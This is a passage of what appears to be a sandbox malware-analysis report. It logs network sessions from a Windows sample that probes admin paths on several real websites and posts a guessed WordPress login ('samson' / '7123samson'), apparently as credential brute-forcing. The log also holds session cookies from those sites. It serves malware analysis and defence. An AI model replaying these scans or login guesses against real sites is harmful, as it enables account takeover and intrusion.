                                                                                                                                                                                                    2023-11-26 05:59:46 UTC8184INData Raw: 2d 32 39 34 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 39 34 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 73 63 72 6f 6c 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 72 6d 61 63 69 6f 6e 2e 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 22 3e 41 43 43 45 53 4f 20 55 53 55 41 52 49 4f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 09 09 09 09 09 3c 64 69 76 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 61 76 69 73 6f 2d 6c 65 67 61 6c 2f
                                                                                                                                                                                                    Data Ascii: -294" class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-294"><a class="page-scroll" target="_blank" href="http://formacion.talentius.com/">ACCESO USUARIO</a></li></ul><div><p><a href="http://talentius.com/aviso-legal/
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC992INData Raw: 33 64 34 0d 0a 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 70 61 72 61 6c 6c 61 78 2d 31 2e 31 2e 33 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 66 61 6e 63 79 62 6f 78 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63
                                                                                                                                                                                                    Data Ascii: 3d4pt type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.parallax-1.1.3.js'></script><script type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.fancybox.js'></script><sc


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    493192.168.2.452460199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1270OUTGET /pma HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6Ik5ObEFRd1R1Zi9HT0oxV2Ircm5UQ2c9PSIsInZhbHVlIjoicURnaEVheXRneW9LMExZd0ZVKzFSYkhteHBSSitDM05jMVF2ZWhOZGJ1TTBkNkFFdi9ZaTN0RVBRTU9GUFM2a0hibWNlYTltcDBJczk3cThMRklYbjBESVh1S1lYbEFIbDAzeS9mbmpzRURJbnAzM3RsdWJsM2tRQUMvQ1ExL3giLCJtYWMiOiI3ZDdiZTY1OTI1YTQ0M2YyMzE2NjE4MTdjNTcyOGY4ZDdkNzNiYzgwNTJmMjA0MWI3Mjc5NjIyMjYzN2M3MmZiIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6Im5SMUR5aGVYRzk5eVNWOVlBMjdGT2c9PSIsInZhbHVlIjoialJJbk1nRlhJdHVqUlovcjZvNHlVaTlWMWFMTUd2RG5TVFVCekxiU25vcjBGTSt5UWNlRDRiT1BuNWR1WVg0OG5RSVhrblVqcmI0SGpsRjhBNnFtR3NZODdNVEx4RUFxaHgyaFhyUjRXTzhuQ1hsbTNleU1PcUkwUXhQWExZazkiLCJtYWMiOiIyMmJkMjM0YTE0OWMxOWZjYWU0MGE1NTc4OTE1NzNkNGEzNzRhNTY4YjVlMmE5OTNkMTAyYjQ4ZWU2ZWE5NDdkIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJrY2ZQV0RLNEsvZ3BJNUk0VFF1dkE9PSIsInZhbHVlIjoibFFjeElYVkxjYWFLc0UwczNUSUZFeEtvNm5OSmN1M0lpQ2doUHJFUzBqVnRpWUZsWEk1aE92YTVGVmVINUpFWWN4YjM5M29WSHFLb29SNlMvUWFsU09FaFR5blJOV0VVMHYrL3JaTGF6bVY1KzdFeGxxa1dxQUZGUC9rNGF4UGQiLCJtYWMiOiIyOWRkODg5NWE1ZWZiODk5MjM0YjZkMTNkZGZhNjcxMGViOWQyMGVlOWM1OWQyZWY4YzA5YWQ2YjFmZjYzYWY2IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1128INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 6d 61 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:46 GMTLocation: https://www.gatewaytoearlylearning.com/pmaSet-Cookie: publishedsite
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 35 36 4e 47 4d 32 54 46 42 31 63 46 4d 76 4e 46 52 53 5a 44 67 35 61 56 52 4a 62 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 7a 42 30 59 58 70 32 55 46 46 44 54 7a 68 72 64 48 59 34 5a 6c 56 53 54 30 68 49 54 6b 78 52 57 56 56 6f 63 56 49 31 4d 32 4e 54 56 6b 30 76 5a 57 56 61 51 6c 42 75 54 55 74 52 4d 6a 51 34 56 7a 56 74 56 56 49 78 52 53 39 49 56 55 51 35 55 48 4a 6f 55 54 6c 6f 59 55 68 73 56 55 35 46 61 33 6c 46 51 6c 41 34 62 57 4a 61 64 53 39 43 63 6d 39 76 64 44 42 51 56 7a 4e 52 5a 31 46 51 5a 6b 6f 72 54 45 55 32 52 58 4a 56 59 32 4e 6d 56 55 51 34 63 46 68 6d 4f 57 64 75 4e 56 41 72 54 56 6c 76 53 44
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6Ik56NGM2TFB1cFMvNFRSZDg5aVRJb3c9PSIsInZhbHVlIjoiZzB0YXp2UFFDTzhrdHY4ZlVST0hITkxRWVVocVI1M2NTVk0vZWVaQlBuTUtRMjQ4VzVtVVIxRS9IVUQ5UHJoUTloYUhsVU5Fa3lFQlA4bWJadS9Ccm9vdDBQVzNRZ1FQZkorTEU2RXJVY2NmVUQ4cFhmOWduNVArTVlvSD
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC426INData Raw: 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 6d 61 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 6d 61 3c 2f 74 69 74 6c 65 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: 19e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/pma'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/pma</title>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    494192.168.2.452478199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1272OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6Ii9jTlJlSTdIWDBqUjEwQkxxQ08weUE9PSIsInZhbHVlIjoiUExnZVdPTGtiWGxNS0xlOHc2YzFtQXNkaGp0bHUyb1I3K2FsNDR2UzJSSld0VGtPbGEybFZEMll6VHZRUFgzK0pTMldRczdXeWkxV20xd0VSRzlyaFliYWVWMFZWRUhVQ2Ixb1NwY3d3NTlyUk1ESHhFOTg1cmVxMHp5VE9QQW4iLCJtYWMiOiIwNjY5NDEyZmY4NTJjNmI4ZjA4ZGEwNjlkMjliZDBhNGJmMzdhYmMzMjcxZWVlNTJkODhmZTlhYTMxMjA4OTRkIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6IjlLZ3o3ZitXTkJMMTc1MHBUSTZrd0E9PSIsInZhbHVlIjoiTTN5QlA4M2RDQmFXR1F6WnV0MjVLRGUyTC82bzlvYnBRSlBuaXJMME96WnZrYjYxL1NRNm1TUFFoREFUOStoM0hRRTNkVGZqa2M5bW5QT21lbG50NmpZcS9kK2ZvWGpoRkhMRzZGekcwaU9kaEV5N29GaTNtQ2oyczZXbEZYaWciLCJtYWMiOiI0NTU5ZTk1NGViNDFjZTAwNWIzZGYyMzEwZjg2YmJlN2JjODZkMzcyNGU0ZGMwMGU1ZjAyMDE1ZDk5ODVmODlhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkJqLzRuT0dNWE1NT1lhV3g3TzdmOHc9PSIsInZhbHVlIjoiVHJuQWlySXVLTURJWG5zd1JjcXFaQzMvQ2ZrRGVhMlZyK0hyL3RkYk9qbXFFaFZPejJmS3J1dDFaYmVIL0xYQTg2RWZxc0xBVitoRU56dHdyMnB3R0c3V29kTmkxdzZaZFkxVmdjdjhucHcyR1ZSY1hrSVA0NGdXSGYwT09QbmwiLCJtYWMiOiIzZDQ1MTNkMDg5OWE3OTQ3NmE3YmM5N2YwMGI3OTI1N2Q2YTM2YjcwZGEzNzJiMDIxMTNkMDg5NTM1NmVmNTU4IiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1130INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:46 GMTLocation: https://www.gatewaytoearlylearning.com/adminSet-Cookie: publishedsi
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 4e 78 52 31 42 75 55 30 74 30 65 55 68 6d 51 31 4a 47 61 55 64 61 53 6d 63 35 54 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 7a 64 56 53 55 68 33 59 6d 4e 51 53 45 78 57 64 45 70 46 57 6d 5a 5a 5a 55 74 6f 4b 32 39 58 55 33 42 69 56 31 51 34 55 6e 4e 49 57 55 70 49 52 58 51 30 61 56 49 76 4d 45 74 6d 55 6b 4a 79 52 57 34 31 54 47 46 71 59 6c 41 79 64 54 4e 73 56 48 64 78 4c 31 4d 76 59 6d 74 46 4c 30 6b 30 63 30 64 69 64 45 68 4f 62 79 73 77 61 47 6c 75 61 6c 64 71 4f 46 42 7a 65 6e 52 4d 56 45 35 76 53 55 64 4b 62 45 35 68 65 57 56 77 5a 47 46 32 64 45 78 7a 5a 6b 64 71 55 45 31 73 56 33 42 4f 64 46 49 33 55 48
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IjNxR1BuU0t0eUhmQ1JGaUdaSmc5Tnc9PSIsInZhbHVlIjoiTzdVSUh3YmNQSExWdEpFWmZZZUtoK29XU3BiV1Q4UnNIWUpIRXQ0aVIvMEtmUkJyRW41TGFqYlAydTNsVHdxL1MvYmtFL0k0c0didEhObyswaGlualdqOFBzenRMVE5vSUdKbE5heWVwZGF2dExzZkdqUE1sV3BOdFI3UH
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC434INData Raw: 31 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 61 64 6d 69 6e 3c 2f 74 69 74 6c 65
                                                                                                                                                                                                    Data Ascii: 1a6<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/admin'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/admin</title


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    495192.168.2.45257366.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC262OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=LvH4Xrnl0rVYyhoO4XsyXtrl76eVXmaMNVuqhXVgIEc-1700978385041-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC553INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: Wor
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    496192.168.2.452780172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC330OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://samson.pe/wp-login.php
                                                                                                                                                                                                    Content-Length: 137
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC137OUTData Raw: 6c 6f 67 3d 73 61 6d 73 6f 6e 26 70 77 64 3d 37 31 32 33 73 61 6d 73 6f 6e 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 49 6e 69 63 69 61 72 2b 73 65 73 69 25 43 33 25 42 33 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 61 6d 73 6f 6e 2e 70 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=samson&pwd=7123samson&rememberme=forever&wp-submit=Iniciar+sesi%C3%B3n&redirect_to=https%3A%2F%2Fsamson.pe%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC813INData Raw: 32 34 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 242e<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC8457INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    497192.168.2.45295223.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC165OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC618INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 61 64 6d 69 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 61 2d 37 63 39 63 34 34 36 63
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/adminServer: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-a-7c9c446c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    498192.168.2.452954162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC398OUTPOST /wp-login.php HTTP/1.1
